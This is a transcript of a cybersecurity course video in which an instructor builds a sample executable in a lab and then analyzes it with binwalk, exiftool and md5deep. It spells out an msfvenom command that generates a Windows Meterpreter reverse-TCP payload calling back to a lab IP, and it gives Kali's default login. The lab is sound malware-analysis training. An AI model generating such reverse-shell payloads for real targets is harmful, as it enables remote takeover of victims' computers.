Analyze and Classify Malware Lab


Time: 9 hours 54 minutes
Difficulty: Intermediate
CEU/CPE: 10
Video Transcription
00:00
Hey, everyone, welcome back to the course. So in the last video, we took a look at how Control number eight, Malware Defenses, mapped to the NIST Cybersecurity Framework. In this video, we're going to do a simple lab where we analyze and classify malware. So we're basically going to be creating an executable and then analyzing that executable file.
00:18
So make sure you're logged into the Cybrary lab environment, so sign in to your Cybrary account. And then once you do so, search for the Analyze and Classify Malware lab. Once you locate that, select the launch button, and the launch item button usually takes about 30 seconds to a minute for the lab to launch, and then you'll see the screen like we have behind me right there.
00:36
Now these step-by-step lab guides, as usual, are in the Resources section of the course. If you have any trouble downloading those, please reach out to the support team.
00:44
So once you're logged into the lab, go ahead and log into the Kali machine, so just click the Other option there, and then we're gonna log in with the traditional Kali credentials, which is the username of root, r-o-o-t, all lowercase, and then the password of toor, t-o-o-r, all lowercase,
01:00
and you'll see a step-by-step lab guide here. I've also got that listed out for you as well.
01:06
So it's going to take a moment or so for the Kali desktop to boot up for us. Once it pulls up for us here, we're going to select the terminal icon just to launch the terminal for us. And then what we're going to do is go ahead and create our malicious executable file.
01:19
So we're gonna click the terminal icon right here. It's this little black box. Just go ahead and select that. That will open the terminal prompt for you.
01:26
And there we're gonna be typing this long command right here. I'm gonna read through it, and then we'll just go ahead and type it in our command prompt. So feel free to pause the video here and type in this entire command. But we're gonna be typing in msfvenom
01:40
space, dash, lowercase a, space, lowercase x86,
01:46
space, dash platform, space, windows, space, dash lowercase p, space, windows, forward slash, meterpreter, forward slash, reverse, underscore, tcp, space, capital LHOST, equals, and then this IP address, space, capital LPORT, equals, and then this port number right here, 443,
02:06
space, dash, lowercase f, space, exe,
02:08
space, dash, lowercase o, space, and then maliciousfile.exe. That's a whole lot to say and a whole lot to type, but we'll get started on that. One thing before we do so I want to mention is: be sure, as you're going through this lab, to follow the steps. Be sure to click through the menu options here and select them
02:27
as you go through and complete each area.
02:30
Make sure you go ahead and select those so you can get full completion for the lab once you're done. You'll notice that I'm not going to do that for the rest of these throughout this lab, because I'm not worried about saving this lab. But be sure to do it on your end, so you can get full credit for completing this lab,
02:44
so let's go ahead and get started here. So again, pause the video here and you can type in the command yourself if you want to.
02:51
Otherwise you can follow along as I type it in. So we're gonna type in lowercase msfvenom,
02:57
a space, lowercase dash a,
03:00
space, lowercase x and the number 86 all together,
03:04
space, and we're gonna put two dashes
03:07
and then the word platform,
03:09
space, windows,
03:12
space, dash, lowercase p,
03:15
space, windows, forward slash,
03:19
meterpreter,
03:22
another forward slash and then reverse, the underscore symbol, and then tcp,
03:28
space, capital LHOST,
03:30
the equal sign, and then the IP address I mentioned before. So the 192.168.0.100.
03:38
We'll put another space, and then we're gonna specify the port number, so LPORT, all caps,
03:43
equals 443,
03:46
space, dash, lowercase f,
03:49
space, exe, all lowercase, space, dash o,
03:53
and then finally, space, malicious
03:58
file.exe.
04:00
Now, in the real world, you're not gonna normally find malware that's listed as maliciousfile.exe, right? It's not that simple, but for our purposes, that's what we'll name it in this lab. So once you've typed all of that, and again, you can pause the video, take your time typing that in,
04:13
and then just restart the video once you're done. Once you've typed all that in, just hit the enter key there. It's going to take a little bit to create this file for us. Once it does, we're just gonna verify that it's actually created the file for us. So I'm gonna briefly pause the video while we wait on it to create that file.
04:29
All right, so we see that it's created the maliciousfile.exe. Let's go ahead and verify that. So we're just going to use the ls command to list out the files, and once we do that, we see maliciousfile.exe is successfully created,
04:41
so let's go back to our step-by-step lab guide. We've done step seven here. That's where we typed in this long command to create our malicious executable. We then just typed ls at the prompt. I'm gonna type in clear. You don't necessarily have to type in clear. I just like to keep my terminal pretty clear as I'm entering different commands.
04:59
The next step we're going to do is we're gonna start analyzing the file. We're going to use a tool called binwalk. We're just gonna type in binwalk, space, dash capital B, and then a space, and then the name of our file.
05:11
So let's go ahead and do that. Now we're gonna type in binwalk, space, dash capital B, and then the file name maliciousfile.exe.
05:19
Just hit the enter key there. It's loading because that's just going to analyze the file for some common signatures for us.
05:27
All right, the next thing we're going to do is here in step 11, where we use binwalk again. We're gonna put a dash 3 this time, and then we're going to take a look at that same malicious file.
05:35
So let's type that in. So binwalk
05:39
space, dash 3, and then space, maliciousfile
05:43
.exe.
05:45
And so again, we're just analyzing here. We can get some basic data back about this particular file,
05:49
and you'll see here that this gives us a visual of the file. So I always like to think of this as, if you're a fan of Star Trek: The Next Generation, this looks like a Borg ship to me. You see, it's kind of cube-like. So it just gives us a graphic of what this malicious file looks like.
06:05
So you can play around with it. I just click on it and drag it around, and you can spin it all different ways and show your friends and everything. But for our purposes, you can just go ahead and close this out once you're done with it.
06:15
So let's go back to our step-by-step lab guide here. The next thing we're going to do is type in binwalk, space, dash capital A, and then we're basically gonna be looking for any opcodes at all. So let's take a look here. So binwalk
06:28
space, dash capital A, and then again, space, and our file name, maliciousfile.exe.
06:35
All right, so we can take a look there and we see the hex that we get back. So
06:40
do you see any... do you see any no-operation opcodes?
06:44
we do see some right there.
06:46
So step 13, we're gonna type in exiftool, space, maliciousfile.exe,
06:51
and then our final step of this lab is actually just performing a hash on the file itself.
06:57
So as you're analyzing malicious files, it's always good to get a hash of them so you can share that with others later on, and also put it in your IDS/IPS systems.
07:05
So exiftool,
07:06
space, maliciousfile
07:10
.exe,
07:13
and you'll see it will also give us some basic information about this particular file as well.
07:16
So, as I mentioned, the very final step in this lab is typing in, to perform a hash, we're gonna do that with md5deep. So just type in md5deep, and then space, and then maliciousfile.exe. So md5deep, all lowercase,
07:30
and then a space and the file name itself. So maliciousfile.exe.
07:36
All right, so you see there we've performed the hash of our file.
07:41
So in this video, we just took a look at creating a malicious file. Again, it was a very simple executable file, and we normally wouldn't name it maliciousfile.exe. We just took a look at the one we created, and then we went ahead and analyzed the file through a few various tools.
07:57
In the next video, we're gonna take a look at Control number nine, which is regarding network ports, protocols and services.